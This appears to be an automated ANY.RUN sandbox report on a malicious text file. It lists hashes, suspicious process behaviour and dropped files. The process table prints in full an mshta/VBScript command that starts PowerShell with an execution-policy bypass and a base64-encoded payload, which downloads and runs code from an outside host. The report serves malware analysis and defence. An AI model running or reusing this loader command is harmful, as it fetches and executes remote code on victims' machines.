analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

New Text Document.txt

Full analysis: https://app.any.run/tasks/e6095610-c47c-4d37-9a48-15f545ddfdf8
Verdict: Malicious activity
Analysis date: June 27, 2022, 06:28:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

29EA3BBF34F3D4D2BD73BBB962ED6E63

SHA1:

015A583092A2FFB7A9893D35F27EE2F7728FA6EE

SHA256:

2B616ABC0EC6BC1DA8EBAD1633FFCFE1BA6F057F288A6937784746A3F8083A57

SSDEEP:

12:oXKNtPNKe2Mf6kasqdnptPEn+iVtRGSBkiJfe2x9KQGWVq1SkuHD2:oXyP1f6kahJp5E7fnJe2yOVqUka2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Checks supported languages

      • mshta.exe (PID: 3840)
      • mshta.exe (PID: 2732)
      • cmd.exe (PID: 3936)
      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
    • Reads the computer name

      • mshta.exe (PID: 3840)
      • mshta.exe (PID: 2732)
      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 3840)
      • mshta.exe (PID: 2732)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3936)
    • Reads the date of Windows installation

      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
    • Executes PowerShell scripts

      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
    • Creates files in the user directory

      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
  • INFO

    • Checks supported languages

      • NOTEPAD.EXE (PID: 2504)
    • Manual execution by user

      • mshta.exe (PID: 3840)
      • cmd.exe (PID: 3936)
      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
    • Reads internet explorer settings

      • mshta.exe (PID: 3840)
      • mshta.exe (PID: 2732)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 3868)
      • powershell.exe (PID: 3944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
6
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start notepad.exe no specs mshta.exe no specs cmd.exe no specs mshta.exe no specs powershell.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2504"C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\AppData\Local\Temp\New Text Document.txt"C:\Windows\system32\NOTEPAD.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3840"C:\Windows\SysWOW64\mshta.exe" mshta vbscript:createobject(wscript.shell).run(PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADgAegBrAC4AZgB1AG4ALwBpAC4AcABoC:\Windows\SysWOW64\mshta.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3936"C:\Windows\system32\cmd.exe" C:\Windows\system32\cmd.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2732C:\Windows\SysWOW64\mshta.exe mshta vbscript:createobject(wscript.shell).run(PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADgAegBrAC4AZgB1AG4ALwBpAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACgAIgAkAGEAIgArACcAMwAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzADAADQAKAH0ADQAKAA==,0)(window.close)C:\Windows\SysWOW64\mshta.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3868"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
3221225786
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3944"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Total events
1 959
Read events
1 839
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
10
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
3868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:AC0CC66E77CEF4BC87840F85F745CCB0
SHA256:D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557
3868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF110378.TMPbinary
MD5:CCFCF369F751CE8DA0370D84E52A7EED
SHA256:53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9
3868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QW22GAMEK0NA1OVX80Z5.tempbinary
MD5:AC0CC66E77CEF4BC87840F85F745CCB0
SHA256:D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C05TMQIUQA3XOBEL8LRQ.tempbinary
MD5:D48DC8803C9B6EACA9E0BD2087029C89
SHA256:ED0445D07F7CFA29B7B93211AE4E05594BA7338CC821AA348DA1BE0DC66FDC19
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D48DC8803C9B6EACA9E0BD2087029C89
SHA256:ED0445D07F7CFA29B7B93211AE4E05594BA7338CC821AA348DA1BE0DC66FDC19
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11756b.TMPbinary
MD5:AC0CC66E77CEF4BC87840F85F745CCB0
SHA256:D5CE7522803DEC2362F98285FCEBBE98EF1E655B3DFC3C363364C82417636557
3944powershell.exeC:\Users\admin\AppData\Local\Temp\jlkhqtgc.q2x.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3868powershell.exeC:\Users\admin\AppData\Local\Temp\omi5kl10.gym.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3868powershell.exeC:\Users\admin\AppData\Local\Temp\y3oppvvs.5ep.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3868powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info